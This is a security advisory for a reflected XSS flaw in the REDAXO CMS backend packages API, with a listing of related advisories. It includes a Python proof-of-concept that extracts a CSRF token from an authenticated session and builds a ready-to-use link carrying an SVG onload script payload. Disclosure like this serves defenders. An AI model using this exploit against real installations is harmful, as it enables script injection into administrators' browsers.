Vulnerability GHSA-xq4j-g85q-wf97

Low Risk
LOW RISK
CVSS Score: 3.0
Score Range: < 4.0
Low severity vulnerabilities (CVSS < 4.0). Hygiene issues that can accumulate but pose lower immediate risk.
5 months ago
April 10, 2026 at 07:40 PM UTC
REDAXO has reflected XSS backend packages API via function parameter (CSRF token required)
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0

Summary

REDAXO has reflected XSS backend packages API via function parameter (CSRF token required)

Details

Summary

A reflected XSS vulnerability has been identified in the REDAXO backend. The function parameter is concatenated into an API error message and rendered without HTML escaping.

PoC - Exploit

#!/usr/bin/env python3
import re
import urllib.parse
import requests

TARGET_URL = "http://poc.local/"
BACKEND_PATH = "redaxo/index.php"

# A valid backend PHP session id (must belong to a user who can access the Packages page)
SESSION_ID = "xxxxxxxxxxxxxxxxxxxxx

https://github.com/user-attachments/assets/94093253-abd6-4380-ad46-6b748541a598

"

VERIFY_SSL = False
TIMEOUT = 15

PAYLOAD = '\\"><svg/onload=alert("Pwned")>'

def build_backend_url() -> str:
    base = TARGET_URL.rstrip('/')
    return f"{base}/{BACKEND_PATH.lstrip('/')}"


def extract_api_csrf(html_text: str) -> str:
    m = re.search(r'rex-api-call=package[^\"]+_csrf_token=([^&\"\s]+)', html_text)
    if not m:
        raise RuntimeError("CSRF token for rex_api_call=package was not found in the page HTML.")
    return m.group(1)

def set_session_cookie(session: requests.Session) -> None:
    parsed = urllib.parse.urlparse(TARGET_URL)
    if parsed.hostname:
        session.cookies.set("PHPSESSID", SESSION_ID, domain=parsed.hostname, path="/")


def main() -> None:
    backend_url = build_backend_url()

    s = requests.Session()
    set_session_cookie(s)

    # Backend session required (role with access to packages)
    r0 = s.get(backend_url, timeout=TIMEOUT, verify=VERIFY_SSL)
    if "rex-page-login" in r0.text or "rex_user_login" in r0.text:
        print("[!] Invalid/expired PHPSESSID. Update SESSION_ID with a valid backend session.")
        return

    r = s.get(backend_url, params={"page": "packages"}, timeout=TIMEOUT, verify=VERIFY_SSL)
    if r.status_code != 200:
        print(f"[!] Failed to access packages page (HTTP {r.status_code}).")
        return

    api_token = extract_api_csrf(r.text)

    params = {
        "page": "packages",
        "rex-api-call": "package",
        "function": PAYLOAD,
        "package": "nonexistent",
        "_csrf_token": api_token,
    }

    exploit_url = f"{backend_url}?{urllib.parse.urlencode(params)}"
    print(exploit_url)


if __name__ == "__main__":
    main()

To run the PoC you must set a valid admin account PHPSSID. The PoC will then automatically retrieve the CSRF token and generate a ready-to-use exploitation link.

Related Vulnerabilities

Other vulnerabilities affecting the same packages

Medium Risk
3 days ago
REDAXO: Unwhitelisted ORDER BY Column in rex_list Allows Authenticated Column Enumeration
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 - 5.21.1 GHSA-4f5f-j737-pm58
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 - 5.21.1 GHSA-4f5f-j737-pm58
Medium Risk
4 days ago
REDAXO: Missing CSRF Protection on Package Update Action Allows Forced Addon Updates
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 - 5.21.1 GHSA-m8r3-22v6-g877
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 - 5.21.1 GHSA-m8r3-22v6-g877
Medium Risk
4 days ago
REDAXO: Stored XSS in Mediapool Sync Page via Unescaped Filesystem Filenames
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 - 5.21.1 GHSA-w998-qmw9-mf4m
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 - 5.21.1 GHSA-w998-qmw9-mf4m
Medium Risk
4 days ago
REDAXO: Stored XSS via Unescaped Media Manager Type Name in `mediaIsInUse()`
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 - 5.21.1 GHSA-mf2p-wjp4-99pq
5.10.0 - 5.10.1 and 5.11.0 - 5.11.2 and 5.12.0 - 5.12.1 and 5.13.0 - 5.13.3 and 5.14.0 - 5.14.3 and 5.15.0 - 5.15.1 and 5.16.0 - 5.20.2 and 5.21.0 - 5.21.1 GHSA-mf2p-wjp4-99pq
High Risk
1 month ago
Redaxo has a Mediapool isAllowedExtension bypass via multi-segment filename that leads to authenticated RCE on Apache mod_php multi-extension handlers
5.18.2 - 5.20.2 and 5.21.0 GHSA-98pp-vccm-qm25
5.18.2 - 5.20.2 and 5.21.0 GHSA-98pp-vccm-qm25
View all vulnerabilities for these packages

Impacted packages

Timeline

Published
5 months ago
April 10, 2026 at 07:40 PM UTC
Fixed (5.21.0)
5 months ago
April 09, 2026 at 12:04 PM UTC
Last Modified
5 months ago
April 10, 2026 at 07:49 PM UTC